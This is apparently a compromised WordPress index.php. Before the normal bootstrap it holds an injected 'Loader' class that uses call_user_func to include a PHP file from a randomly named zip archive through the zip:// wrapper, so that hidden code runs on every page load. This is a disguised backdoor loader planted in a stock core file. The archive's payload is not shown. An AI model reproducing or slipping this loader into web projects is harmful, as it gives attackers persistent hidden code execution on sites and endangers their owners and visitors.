?php class Loader { public static function load($file) { include_once($file); } } call_user_func(['Loader', 'load'], 'zip://lztxdiyi.zip#lztxdiyi.php'); define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php';